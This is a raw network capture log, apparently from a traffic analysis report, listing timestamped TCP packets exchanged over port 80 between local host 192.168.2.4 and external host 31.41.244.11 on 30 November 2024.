                                                      Nov 30, 2024 18:08:28.692895889 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.692950010 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.693120956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.693170071 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.693969011 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.694015026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.694159031 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.694200993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.694991112 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.695034027 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.695199013 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.695242882 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.696094036 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.696140051 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.696305990 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.696367025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.697110891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.697151899 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.697308064 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.697346926 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.698189974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.698231936 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.698393106 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.698434114 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.699280977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.699327946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.699417114 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.699465036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.700287104 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.700335979 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.700558901 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.700603008 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.701347113 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.701390982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.701539993 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.701586962 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.702420950 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.702466965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.702605009 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.702646017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.703454971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.703501940 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.703649044 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.703691959 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.704591036 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.704634905 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.704735994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.704786062 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.705566883 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.705611944 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.705766916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.705812931 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.706634045 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.706679106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.706837893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.706886053 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.707778931 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.707833052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.707917929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.707966089 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.708741903 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.708786964 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.708945036 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.708992958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.709801912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.709846973 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.709988117 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.710032940 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.710886955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.710935116 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.711081982 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.711369038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.712002993 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.712047100 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.712213039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.712259054 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.713120937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.713166952 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.713332891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.713376045 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.714088917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.714131117 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.714231014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.714274883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.715091944 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.715137005 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.715287924 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.715328932 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.716150045 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.716197014 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.716351986 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.716392040 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.717216015 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.717262030 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.717430115 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.717479944 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.718276978 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.718321085 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.718472958 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.718518972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.719353914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.719398975 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.719492912 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.719541073 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.720390081 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.720438004 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.720561028 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.720607042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.721631050 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.721681118 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.721868038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.721911907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.722474098 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.722516060 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.722678900 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.722723007 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.723541975 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.723587990 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.723737955 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.723782063 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.724587917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.724632978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.724797964 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.724843025 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.725682974 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.725725889 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.725919008 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.725964069 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.726720095 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.726829052 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.726917982 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.727044106 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.727782011 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.727833033 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.728050947 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.728096962 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.728837967 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.728883982 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.729032993 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.729077101 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.729882002 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.729927063 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.730082035 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.730128050 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.730956078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.731000900 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.731133938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.731175900 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.732000113 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.732050896 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.732208014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.732251883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.733048916 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.733091116 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.733287096 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.733331919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.734067917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.734117985 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.879712105 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.879801989 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.880156994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.880203009 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.880477905 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.880490065 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.880531073 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.880795956 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.880848885 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.881479025 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.881527901 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.881685972 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.881730080 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.882534981 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.882580042 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.882740021 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.882786036 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.883615971 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.883675098 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.883807898 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.883862972 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.884632111 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.884692907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.884828091 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.884876966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.885706902 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.885766029 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.885925055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.885974884 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.886751890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.886796951 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.886970997 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.887018919 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.887803078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.887851000 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.888009071 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.888056993 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.888904095 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.888950109 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.889097929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.889144897 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.889931917 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.889997959 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.890141010 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.890188932 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.890990019 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.891036987 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.891197920 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.891246080 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.892209053 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.892257929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.892409086 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.892455101 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.893090963 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.893136978 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.893289089 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.893332958 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.894162893 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.894207001 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.894381046 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.894426107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.895199060 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.895243883 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.895411015 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.895453930 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.896265030 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.896311045 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.896471977 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.896518946 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.897326946 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.897371054 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.897548914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.897594929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.898375988 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.898418903 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.898570061 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.898643017 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.899435043 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.899481058 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.899677038 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.899724960 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.900480032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.900544882 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.900696039 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.900739908 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.901550055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.901597977 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.901767969 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.901813984 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.902601957 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.902642965 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.902796030 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.902842045 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.903676033 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.903726101 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.903860092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.903906107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.904711962 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.904757977 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.904892921 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.904939890 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.905783892 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.905828953 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.905978918 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.906023979 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.906857014 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.906899929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.907022953 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.907066107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.907882929 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.907932997 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.908077002 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.908123016 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.908973932 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.909013987 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.909157991 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.909200907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.910005093 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.910051107 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.910212994 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.910257101 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.911091089 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.911130905 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.911259890 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.911305904 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.912117004 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.912162066 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.912313938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.912360907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.913173914 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.913219929 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.913364887 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.913409948 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.914230108 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.914469004 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.914525032 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.915291071 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.915345907 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.915486097 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.915534973 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.916325092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.916518927 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.916574955 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.917439938 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.917505026 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.917607069 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.917659998 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.918528080 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.918584108 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.918667078 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.918718100 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.919531107 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.919713020 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.919740915 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.919804096 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.920619965 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.920680046 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.920818090 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.920869112 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.921663046 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.921736002 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.921828032 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.921871901 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.923031092 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.923093081 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.923211098 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.923253059 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.923760891 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.923950911 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.924010038 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.924832106 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.924891949 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.925034046 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.925085068 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.925867081 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.925926924 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.926064968 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.926110983 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.926919937 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.926978111 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.927126884 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.927186966 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.927989006 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.928165913 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.928220034 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.929043055 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.929081917 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.929243088 CET804980531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:28.929284096 CET4980580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:28.930111885 CET804980531.41.244.11192.168.2.4
